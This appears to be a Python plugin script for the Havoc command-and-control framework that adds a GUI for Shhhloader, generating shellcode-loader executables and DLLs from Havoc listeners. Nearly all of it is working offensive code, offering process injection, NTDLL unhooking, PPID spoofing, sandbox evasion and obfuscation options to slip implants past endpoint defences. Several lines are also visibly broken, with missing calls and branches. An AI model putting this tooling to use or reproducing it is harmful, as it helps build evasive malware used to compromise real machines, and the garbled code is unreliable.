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Shhhloader integration for Havoc
#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
# Author: Jakob Friedl
# Created on: Mon, 16. Oct 2023
# Description: Shhhloader support for Havoc C2 framework
# Usage: Load this script into Havoc: Scripts -> Scripts Manager -> Load to create Shhhloader Tab
import os, sys, subprocess
import threading
import havoc
import havocui
from datetime import datetime
from base64 import b64decode, b64encode
# Configuration
shhhloader_path = "/opt/Shhhloader"
python_path = "/usr/bin/python3"
payload_file_path = "/tmp/payload.bin"
current_path = os.getcwd()
# Variables & Defaults
shellcode_path = ""
generate_from_listener = False
listener = ""
syscall_exec_method = "GetSyscallStub"
shellcode_exec_method = "QueueUserAPC"
process = "explorer.exe"
unhook_flag = ""
dll_flag = ""
proxy_dll = ""
verbose_flag = ""
word_encode_flag = ""
no_randomize_flag = ""
no_sandbox_flag = ""
llvm_flag = ""
ppid_flag = ""
ppid_priv_flag = ""
parent_process = "explorer.exe"
sandbox_evasion_method = "sleep"
sandbox_argument = ""
create_process_flag = ""
target_dll = "ntdll.dll"
export_function = "NtClose"
# Colors
havoc_error = "#ff5555" # Red
havoc_success = "#50fa7b" # Green
havoc_comment = "#6272a4" # Greyish blue
havoc_dark = "#555766" # Dark Grey
havoc_info = "#8be9fd" # Cyan
havoc_warning = "#ffb86c" # Orange
if not os.path.exists(shhhloader_path):
print("[-] Shhhloader not found in: ", shhhloader_path)
havocui.messagebox("Shhhloader not found in: ", shhhloader_path)
# Create dialog and log widget
dialog = havocui.Dialog("Shhhloader Payload Generator", True, 670, 800)
log = havocui.Logger("Shhhavoc Log")
# Add Options
def change_listener(num):
global generate_from_listener
global listener
if num:
listener = listeners[num - 1]
generate_from_listener = True
generate_from_listener = False
print("[*] Listener changed: ", listener)
label_to_replace = f"<b style=\"color:{havoc_error};\">No shellcode selected.</b>"
def change_shellcode_path():
global shellcode_path
global label_to_replace
shellcode_path = havocui.openfiledialog("Shellcode path").decode("ascii")
print("[*] Shellcode path changed: ", shellcode_path, ".")
formatted_shellcode_path = f"<span style=\"color:{havoc_success};\">{shellcode_path}</span>"
dialog.replaceLabel(label_to_replace, formatted_shellcode_path)
label_to_replace = formatted_shellcode_path if shellcode_path != " " else f"<b style=\"color:{havoc_error};\">No shellcode selected.</b>"
syscall_exec_methods = ["SysWhispers2", "SysWhispers3", "None"]
def change_syscall_exec_method(num):
global syscall_exec_method
if num:
syscall_exec_method = syscall_exec_methods[num - 1]
syscall_exec_method = "GetSyscallStub"
print("[*] Syscall execution method changed: ", syscall_exec_method)
shellcode_exec_methods = ["ThreadlessInject", "ModuleStomping", "ProcessHollow", "EnumDisplayMonitors", "RemoteThreadContext", "RemoteThreadSuspended", "CurrentThread"]
def change_shellcode_exec_method(num):
global shellcode_exec_method
if num:
shellcode_exec_method = shellcode_exec_methods[num - 1]
shellcode_exec_method = "QueueUserAPC"
print("[*] Shellcode execution method changed: ", shellcode_exec_method)
payload_types = ["dll"]
def change_payload_type(num):
global dll_flag
if num:
dll_flag = "-d"
dll_flag = ""
print("[*] DLL flag changed: ", bool(dll_flag))
def change_process(p):
global process
process = p
print("[*] Process changed: ", process)
def change_verbose():
global verbose_flag
verbose_flag = "-v" if not bool(verbose_flag) else ""
print("[*] Verbose flag changed: ", bool(verbose_flag))
def change_unhook():
global unhook_flag
unhook_flag = "-u" if not bool(unhook_flag) else ""
print("[*] Unhook flag changed: ", bool(unhook_flag))
def change_no_randomize():
global no_randomize_flag
no_randomize_flag = "-nr" if not bool(no_randomize_flag) else ""
print("[*] No-randomize flag changed: ", bool(no_randomize_flag))
def change_no_sandbox():
global no_sandbox_flag
no_sandbox_flag = "-ns" if not bool(no_sandbox_flag) else ""
print("[*] No-sandbox flag changed: ", bool(no_sandbox_flag))
def change_llvm():
global llvm_flag
llvm_flag = "-l" if not bool(llvm_flag) else ""
print("[*] LLVM flag changed: ", bool(llvm_flag))
def change_ppid_spoofing():
global ppid_flag
ppid_flag = "-np" if not bool(ppid_flag) else ""
print("[*] No-PPID flag changed: ", bool(ppid_flag))
def change_ppid_priv():
global ppid_priv_flag
ppid_priv_flag = "-ppv" if not bool(ppid_priv_flag) else ""
print("[*] PPID-Priv flag changed: ", bool(ppid_priv_flag))
encoding_methods = ["English Words"]
def change_encoding_method(num):
global word_encode_flag
if num:
word_encode_flag = "-w"
word_encode_flag = ""
print("[*] Word-encoding flag changed: ", bool(word_encode_flag))
sandbox_evasion_methods = ["domain", "hostname", "username", "dll"]
def change_sandbox_evasion_method(num):
global sandbox_evasion_method
if num:
sandbox_evasion_method = sandbox_evasion_methods[num - 1]
sandbox_evasion_method = "sleep"
print("[*] Sandbox evasion method changed: ", sandbox_evasion_method)
def change_sandbox_argument(arg):
global sandbox_argument
sandbox_argument = arg
print("[*] Sandbox argument changed: ", sandbox_argument)
def change_proxy_dll(arg):
global proxy_dll
proxy_dll = arg
print("[*] Proxy DLL changed: ", proxy_dll)
def change_parent_process(p):
global parent_process
parent_process = p
print("[*] Parent process changed: ", parent_process)
def change_create_process():
global create_process_flag
create_process_flag = "-cp" if not bool(create_process_flag) else ""
print("[*] Create-process flag changed: ", bool(create_process_flag))
def change_target_dll(arg):
global target_dll
target_dll = arg
print("[*] Target DLL changed: ", target_dll)
def change_export_function(arg):
global export_function
export_function = arg
print("[*] Export function changed: ", export_function)
# Execute Shhhloader and get output
def execute(file):
flags = f"{unhook_flag} {dll_flag} {verbose_flag} {llvm_flag} {no_randomize_flag} {no_sandbox_flag} {word_encode_flag} {ppid_flag} {ppid_priv_flag}"
if sandbox_evasion_method != "sleep":
flags = flags + f" -s {sandbox_evasion_method}"
if sandbox_argument != "":
flags = flags + f" -sa {sandbox_argument}"
if proxy_dll != "":
flags = flags + f" -dp {proxy_dll}"
if parent_process != "":
flags = flags + f" -pp {parent_process}"
if process != "":
flags = flags + f" -p {process}"
# Threadless Inject options
if shellcode_exec_method == "ThreadlessInject":
flags = flags + f" {create_process_flag} -td {target_dll} -ef {export_function}"
log.addText(f"[<span style=\"color:{havoc_info};\">*</span>] Selecting output file path.")
outfile = havocui.savefiledialog("Save").decode("ascii")
if outfile == "":
log.addText(f"[<span style=\"color:{havoc_warning};\">-</span>] No output file path specified. Defaulting to /tmp/a.exe.")
outfile = "/tmp/a.exe"
log.addText(f"[<span style=\"color:{havoc_success};\">+</span>] Output file path specified: {outfile}.")
# change dir
# Exec Shhhloader and get output
cmd = f"{python_path} {shhhloader_path}/ {file} -sc {syscall_exec_method} -m {shellcode_exec_method} -o {outfile} {flags}"
output =[arg for arg in cmd.split(" ") if arg != ""], capture_output = True)
decoded_stdout = output.stdout.decode("utf-8")
decoded_stderr = output.stderr.decode("utf-8")
except Exception as e:
# reset dir
# Create Log
log.addText(f"[<span style=\"color:{havoc_info};\">*</span>] <span>{' '.join(output.args)}</span>")
if output.stderr != b"":
log.addText(f"<b style=\"color:{havoc_error};\">Error:</b>")
log.addText(f"<span style=\"color:{havoc_error};\">{decoded_stderr}</span>")
log.addText(f"<b style=\"color:{havoc_success};\">Payload generated successfully at {outfile}!</b>")
# Get demon shellcode and save it to file
def save_payload(data):
log.addText(f"[<span style=\"color:{havoc_success};\">+</span>] Received B64 payload.")
with open(payload_file_path, "wb") as file:
log.addText(f"[<span style=\"color:{havoc_success};\">+</span>] Wrote shellcode to file: {payload_file_path}.")
# Generate payload
def run():
log.addText(f"<b style=\"color:{havoc_dark};\">──────────────────────────────────────────────────────────────────────────────────────────────────────────</b>")
log.addText(f"<b style=\"color:{havoc_comment};\">{'%d/%m/%Y %H:%M:%S')} </b>")
# Generate shellcode from listener
if generate_from_listener:
log.addText(f"[<span style=\"color:{havoc_info};\">*</span>] Generating payload for listener: <b style=\"color:{havoc_info};\">{listener}</b>")
# Generate demon shellcode
"Windows Exe",
"{ \
\"Amsi/Etw Patch\": \"None\", \
\"Indirect Syscall\": false, \
\"Injection\": { \
\"Alloc\": \"Native/Syscall\", \
\"Execute\": \"Native/Syscall\", \
\"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\", \
\"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\" \
}, \
\"Jitter\": \"15\", \
\"Proxy Loading\": \"None (LdrLoadDll)\", \
\"Sleep\": \"2\", \
\"Sleep Technique\": \"Ekko\", \
\"Stack Duplication\": false \
if shellcode_path == "":
havocui.messagebox("Error", "Please specify a valid shellcode path.")
log.addText(f"[<span style=\"color:{havoc_error};\">-</span>] No shellcode file specified.")
# Reset variable values
def set_default_values():
global generate_from_listener, listener, syscall_exec_method, shellcode_exec_method, process, unhook_flag, dll_flag, proxy_dll, verbose_flag, word_encode_flag, no_randomize_flag, no_sandbox_flag, llvm_flag, ppid_flag, ppid_priv_flag, parent_process, sandbox_evasion_method, sandbox_argument, create_process_flag, target_dll, export_function
generate_from_listener = False
listener = ""
syscall_exec_method = "GetSyscallStub"
shellcode_exec_method = "QueueUserAPC"
process = "explorer.exe"
unhook_flag = ""
dll_flag = ""
proxy_dll = ""
verbose_flag = ""
word_encode_flag = ""
no_randomize_flag = ""
no_sandbox_flag = ""
llvm_flag = ""
ppid_flag = ""
ppid_priv_flag = ""
parent_process = "explorer.exe"
sandbox_evasion_method = "sleep"
sandbox_argument = ""
create_process_flag = ""
target_dll = "ntdll.dll"
export_function = "NtClose"
def build():
# Get Listeners
global listeners
listeners = havoc.GetListeners()
# Build Dialog
dialog.addLabel(f"<b>────────────────────────────── Required Settings ──────────────────────────────</b>")
dialog.addLabel("<b>[*] Shellcode (upload file or generate from Havoc listener)</b>")
dialog.addCombobox(change_listener, "Upload from file", *listeners)
dialog.addButton("Choose shellcode", change_shellcode_path)
dialog.addLabel("<b>[*] Syscall execution method</b>")
dialog.addCombobox(change_syscall_exec_method, "GetSyscallStub", *syscall_exec_methods)
dialog.addLabel("<b>[*] Shellcode execution method</b>")
dialog.addCombobox(change_shellcode_exec_method, "QueueUserAPC", *shellcode_exec_methods)
dialog.addLabel("<b>[*] Payload type</b>")
dialog.addCombobox(change_payload_type, "exe", *payload_types)
dialog.addLabel("<b>[*] Injection Process (Default: explorer.exe)</b>")
dialog.addLineedit("e.g. explorer.exe", change_process)
dialog.addLabel("<b>────────────────────────────── Optional Settings ──────────────────────────────</b>")
dialog.addCheckbox("Verbose (Default: False)", change_verbose)
dialog.addCheckbox("Unhook NTDLL (Default: False)", change_unhook)
dialog.addCheckbox("Disable syscall name randomization (Default: False)", change_no_randomize)
dialog.addCheckbox("Disable sandbox checks (Default: False)", change_no_sandbox)
dialog.addCheckbox("Use Obfuscator-LLVM (Default: False)", change_llvm)
dialog.addCheckbox("Disable PPID spoofing (Default: False)", change_ppid_spoofing)
dialog.addCheckbox("Enable spoofing for privileged parent process (Default: False)", change_ppid_priv)
dialog.addLabel("<b>[#] Word-encoding method (Default: XOR)</b>")
dialog.addCombobox(change_encoding_method, "XOR", *encoding_methods)
dialog.addLabel("<b>[#] Sandbox evasion technique (Default: sleep)</b>")
dialog.addCombobox(change_sandbox_evasion_method, "sleep", *sandbox_evasion_methods)
dialog.addLabel("<b>[#] Sandbox evasion argument</b>")
dialog.addLineedit("e.g. testlab.local", change_sandbox_argument)
dialog.addLabel(f"<b>[#] Proxy DLL (must exist in {shhhloader_path})</b>")
dialog.addLineedit("e.g. apphelp.dll", change_proxy_dll)
dialog.addLabel(f"<b>[#] Parent process for PPID spoofing (Default: explorer.exe)</b>")
dialog.addLineedit("e.g. explorer.exe", change_parent_process)
dialog.addLabel("<b>────────────────────────────── ThreadlessInject ──────────────────────────────</b>")
dialog.addCheckbox("Create process instead of injecting into one (Default: False)", change_create_process)
dialog.addLabel(f"<b>[#] Target DDL containing export function (Default: ntdll.dll)</b>")
dialog.addLineedit("e.g. ntdll.dll", change_target_dll)
dialog.addLabel(f"<b>[#] Export function to overwrite (Default: NtClose)</b>")
dialog.addLineedit("e.g. NtClose", change_export_function)
dialog.addButton("Generate", run)
# Create Tab
def shhhloader_generator():
havocui.createtab("Shhhavoc", "Shhhloader", shhhloader_generator)
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Edit - Oct. 23 2023:

  • Added dynamic payload generation based on Havoc listeners
  • Added Threadless Inject options
  • Added better logging


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